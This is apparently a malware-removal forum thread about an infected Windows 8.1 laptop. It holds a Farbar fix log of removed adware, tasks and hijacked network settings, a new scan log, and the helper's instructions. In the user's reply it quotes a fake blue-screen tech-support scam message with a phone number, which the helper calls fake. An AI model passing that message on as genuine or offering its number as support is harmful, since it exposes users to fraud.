Last bit of the log and just to let you know that the original message is still there on the computer :( Seems like I'm in the same place - any further instructions to follow?

*****************

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll => moved successfully
Could not replace C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
C:\Windows\System32\dnsapi.dll => moved successfully
C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll copied successfully to C:\Windows\System32\dnsapi.dll
C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll => moved successfully
Could not replace C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
C:\Windows\SysWOW64\dnsapi.dll => moved successfully
C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll copied successfully to C:\Windows\SysWOW64\dnsapi.dll
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\Sound+ => value removed successfully
C:\Program Files\Sound+ => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\LManager => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\oasi_en_323010107 => value removed successfully
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableTaskMgr => value removed successfully
"C:\ProgramData\Medlight\Icenix.dll" => Value data removed successfully.
"C:\ProgramData\Medlight\Topstrong.dll" => Value data removed successfully.
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000001" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000002" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000003" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000016" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKU\S-1-5-21-3773202632-424774445-890114178-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
AmazingTab => service removed successfully
C:\Program Files\amztab => moved successfully
Gejdiubx => service removed successfully
EagleX64 => service removed successfully
swsedrvr_vw_1_10_0_25 => service removed successfully
C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt => moved successfully
C:\Users\owner\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt => moved successfully
C:\Users\owner\AppData\Roaming\WB.CFG => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.dat => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.exe => moved successfully
C:\Users\owner\AppData\Local\Donelectronics.exe.config => moved successfully
C:\Users\owner\AppData\Local\dsi1.dat => moved successfully
C:\Users\owner\AppData\Local\dsi2.dat => moved successfully
C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E} => moved successfully
C:\ProgramData\DP45977C.lfl => moved successfully
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => moved successfully
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => moved successfully
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\amzngtb.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\avg6A34.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\avgE955.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\nsz1850.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\setup_766.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\SpOrder.dll => moved successfully
C:\Users\owner\AppData\Local\Temp\TranDex.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Uninstall.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Vivafind.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\Voldom.exe => moved successfully
C:\Users\owner\AppData\Local\Temp\widgett.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{08E144DB-88C1-4779-A060-554E4829D9D2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08E144DB-88C1-4779-A060-554E4829D9D2}" => key removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main" => key removed successfully
C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{16528CA3-F849-4C28-B9DC-48BEBB959C9B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16528CA3-F849-4C28-B9DC-48BEBB959C9B}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23794007-224A-4E7F-9BBD-DF81D69DA5C6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23794007-224A-4E7F-9BBD-DF81D69DA5C6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Wse_taplika => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2973220D-0686-4846-8402-1B6902AB5EE0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2973220D-0686-4846-8402-1B6902AB5EE0}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Monitor => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2EE58792-0DF1-43F3-8876-01F8D027EEC0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2EE58792-0DF1-43F3-8876-01F8D027EEC0}" => key removed successfully
C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Pending Update" => key removed successfully
"C:\Program Files (x86)\SwiftSearch_1.10.0.25" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3AFE7DCE-A37F-406C-8FF9-4C2024106030}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3AFE7DCE-A37F-406C-8FF9-4C2024106030}" => key removed successfully
C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Core" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{67153154-EDE8-41E9-947F-1251F35B6C8D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{67153154-EDE8-41E9-947F-1251F35B6C8D}" => key removed successfully
C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0D0F7F47-0B7A-097F-7E11-050A09041178}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{680E9242-EA06-4B9A-AD7F-3CB4585120DE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{680E9242-EA06-4B9A-AD7F-3CB4585120DE}" => key removed successfully
C:\WINDOWS\System32\Tasks\psv_Temptough => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Temptough" => key removed successfully
"C:\ProgramData\Medlight\Physronwarm.reg" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{92D813B2-AA5B-4A97-93B5-19CC0A69B867}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{92D813B2-AA5B-4A97-93B5-19CC0A69B867}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9DDA3311-9424-4D32-902F-22A85EE0905D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DDA3311-9424-4D32-902F-22A85EE0905D}" => key removed successfully
C:\WINDOWS\System32\Tasks\LSNHDG1 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LSNHDG1" => key removed successfully
"C:\ProgramData\Medlight" => not found.
"C:\ProgramData\FlashBeat" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A56409DE-600B-4BC0-9A96-DF01E8D4AA28}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A56409DE-600B-4BC0-9A96-DF01E8D4AA28}" => key removed successfully
C:\WINDOWS\System32\Tasks\psv_Tripplezap => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Tripplezap" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A6208F98-D826-4652-BF83-E7D44CA2A837}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6208F98-D826-4652-BF83-E7D44CA2A837}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSARCHBOLD => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF2DA830-E9A5-4C18-9C70-0913A510B21C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF2DA830-E9A5-4C18-9C70-0913A510B21C}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System CarePeriod => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C0596212-D5EE-44AF-AAAB-07C61EDA0EC5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0596212-D5EE-44AF-AAAB-07C61EDA0EC5}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Taplika nise => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F975168C-909D-4C2D-8BC0-CFD9AC8553A4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F975168C-909D-4C2D-8BC0-CFD9AC8553A4}" => key removed successfully
C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UXJOVQQVBISGUWLJ" => key removed successfully
"C:\ProgramData\Service1291" => not found.
C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => moved successfully


The system needed a reboot.

==== End of Fixlog 20:36:09 ====
 
Did you restart computer?
What does the message say?
Is it present in normal mode only?
Does safe mode WITH NETWORKING work?
 
So to answer:

Did you restart computer? Yes
What does the message say?

Original message with blue screen background:

Error................

The Problem seems to be caused by following files: kbdhid.sys
MANUALLY_INITIATED_CRASH

:( Restarting

(Caution triangle icon) Windows has detected usual activity and Security Breach on your Computer network and Infected Windows Files, Settings and Data.

Technical Information
Contact Windos Support Center for Further Assistance :-
Call Toll Free : 1-800-245-2579


Is it present in normal mode only? Yes
Does safe mode WITH NETWORKING work? Safe mode works when I can manage to get into it. Networking is available; however, I would need to set up an VPN. I've got wireless at home but for some reason my LAN doesn't work on my modem.

Hope that this info helps you....thanks for helping me ;)
 
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

  • Double click to run it.
  • Make sure you checkmark Addition.txt box.
  • Press Scan button.
  • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
 
Kbdhid.sys sems to be keyboard driver related.

The other message comes from an infection. Fake!
 
Now I can see more infection present in Task Scheduler so let's see if we can get rid of that as well.
 
Thanks for looking into this - I kinda knew that the error message was fake especially with the upside-down smilely faces and all of the pop-up ads. This may take some time as I've had a problem getting into safe mode.
 
So here's the first log txt and the additional txt log will follow:

can result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 21:12:54)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
